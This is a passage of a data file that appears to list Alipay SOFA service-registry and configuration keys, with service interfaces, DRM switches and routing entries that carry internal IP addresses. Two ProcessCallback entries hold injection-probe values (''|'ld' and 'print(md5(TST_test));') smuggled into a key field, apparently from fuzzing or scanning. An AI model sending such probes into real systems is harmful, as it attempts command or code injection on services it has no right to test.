lipay.caselike.facade.FuzzTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recon.common.service.query.fund.api.QueryBillLinkLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.common.service.integration.pkgcore.PackageQueryForMobileFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.finpwm.censusLogSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_KBSYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@charityasset#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sofa.rpc.elastic.ElasticService:1.0:anteye@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:antfeaturemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.risk.RiskDecisionConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpay.common.service.facade.FinassetPayOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.opinioncore.emcooperateZdalDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.100.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cif:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.modelTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.poscore.common.service.facade.depositback.DepositBackSerialNumberService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PLEDGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.creditguarantee.common.service.facade.GuaranteeReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.224.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.AccessCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:'|'ld@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_FUND_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundselling.share.purchase.service.PurchaseRaiseDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.0.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.stocksupervise.common.service.facade.SofitoPromoInspectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditbillcenter.facade.service.sync.UnionCardSyncDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cloud.opscore.common.service.facade.OpsFlowRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.mng.CallInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.razor.metadata.RazorFeatureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:voucherprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.counter.api.CounterFacadeV4:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.RecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.core.service.graylog.GraylogQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.messagefusion.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.mrchprod.common.service.facade.merchant.MrchprodIndirectMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.18.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.facade.risk.RiskValQuestionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.exchange.service.JfbBenefitExchangeConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.AdminFundQuotationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:print(md5(TST_test));@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.rpc.CommunityRpc:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.spi.callback.AgreementCallBackService:1.0:virtualprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetxp.common.service.facade.api.prod.ExchangeInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.cat.facade.CatBizOwnerService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antzproxy.tr#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundtrade.common.service.facade.api.FundTradeTransitionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.TimeOutTaskRetryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.activity.ActivityControlRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:bkloanfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.rel.api.AppRelationOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.20.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilesearch.common.service.facade.spi.service.MobileSearchSpiService:1.0:antassistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.EquityYebPlusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:creditutcoreExternalAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipayment.service.facade.api.WithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.dwebupload.client.drm.DomainConfig.downloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.common.service.facade.cfgriskctrl.AppRuleCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_ZINTCLCN_PRICECLCN_SVLESS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileorderprod.service.api.mng.OrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:voucherprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.channelspop.service.decision.channel.ChannelGridFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.CalendarService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finresprod.service.facade.api.verify.VerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mbuyer.common.service.facade.price.GoodsPriceConsitiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstoperation.common.service.facade.api.config.CommonConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:porder@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.picture.facade.PictureQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clrfinancing.facade.api.RepaymentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.SceneService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.manager.LoanAccountBalanceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.displayImportantNoteMerchant,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkloantrade.common.service.facade.lend.api.TbTransRecordConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.zoloz.zhub.smilepay.SmileToAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.emcsql.common.service.facade.api.EmcMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_generalTransfer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.PublicResourceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:OPS_RELEASE_INSTANCE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.ranking.parameter.StarWishDRMResource.maxPosition,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.grayprod.change.drm.ChangePolicy.testUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.defin.framework.mychain.pullblock.facade.BlockConsumerService:1.0:cardBlockConsumerService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.RulecenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linku.common.service.facade.secret.SecretFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.app.AppServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.income.common.service.facade.PaymentVoucherQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.DocumentTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.BankCardValidateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.ProductRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthprod.service.facade.ZhiMaGoCumulativeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.assetcore.zcb.facade.ZCBAssetDetailItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.xcpt.CoCheckProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mdeviceprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_ZQUALITYPIVOT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csplatform.service.facade.api.ServiceRecordService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:huanyu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-ideroute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.caifuhaoGrayFalg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mpscore.common.service.facade.service.model.MpsModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.cacheRebuildOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.237.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tbx.common.service.facade.ToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.biz.bluebird.api.service.BlueBirdMessageConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_GUARCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpaas:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcommerceprod.common.service.facade.wireless.ZoneCategoryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FinInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.speedup.DataOutputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.xview.conf.facade.XViewConfService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.core.service.repository.BizCommonLogRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.template.IppTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.mng.feature.facade.ModelDataviewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.life.LifeContentServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.apm.facade.pool.clear.ClearPlanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.RelieveOldPunishSwitchResourceImpl.switchOpenDelayVal,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:mrchstoreapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_YDATABUS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mdiscountprod.common.service.facade.spi.KabaoprodSpiService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.servicereach.QuerySignModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkhousefin.common.service.facade.CollectingTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue23#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.icfmng.common.service.facade.api.ReverseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:riskfinder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:secuinfos@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.HaitunAppLoader:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.sigmaAliOverQuotaCpu,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:charge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.isCloseLevelVerify,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.taobao.tddl.v1_psbpmedicalapp_replication.switch#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromobus.common.service.facade.thirdparty.DolphinDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.endorse.EndorseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.loadtest.api.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.ConfigServerOpFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.autoinsprod.common.data.QueryFacadeService:1.0:autoaftermarketunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.context.facade.CserviceContextService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:dcepAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exctradequery.common.service.facade.ExcTradeModelQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.scheduler.common.service.facade.update.TaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeShopCollagePidsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetpreference.api.facade.FapMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.service.EmergencyPlanFacade:1.0:whitePaperEmergencyPlanProvider@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.cmng.push.InnerPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:adc_data@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:fcinstassetmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.msg.MsgServiceCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizinsight.common.service.facade.crowd.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.product.SalesProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.118.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.ecm.common.service.facade.api.EcmCrossCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.InsCommercialTouchTaskDRM.splitTaskNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.5.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_SCCOUNTER_DELIVER_EXCHANGE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbomp.common.service.facade.manager.api.ActivityQueryFacade4Alsc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ap.api.ContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dwsap.common.service.facade.datasource.OdpsTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openhome.facade.pamir.login.PamLoginFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxUiQuoteConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.AutoDepositFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.user.service.L2AccountBankCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopAnalysisQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfbrmp.facade.GfbrmpPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillJFMngCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dk.common.service.facade.aiops.AiRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appinstancegroupversion.ExecutionResultFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LendStatusCountDrm.lendCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.common.service.facade.api.EinvServerAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:antdsm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bklid.facade.api.BklidCtrlLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.clear.common.service.facade.BizNodeDependencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmerchant.service.facade.OpenHomePcmtProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zconsole.msgdelayed.NewMsgDeliveryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.senior.common.service.facade.family.api.FamilyMembersRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.invite.AutoMktInviteFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BelongToConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.core.service.monthscope.base.BaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rassistcenter.common.service.facade.api.InspectionReportManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_BANK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_ALCONTRACT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_MOBILESPCTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.96.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.biz.service.gw.community.api.friendships.TwoWayFriendshipsManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.225.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:unitradeadapter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.assemble.SnapshotAssembleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.socrates.PoliciesBasedRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.speech.comment.CommentGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.baseAssertAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.data.process.facade.code.PreCompileService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.aipPromoPackVoucherDefaultAlipassTemplateId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.minDiscountRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gffintrade.common.service.facade.api.InvestOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipa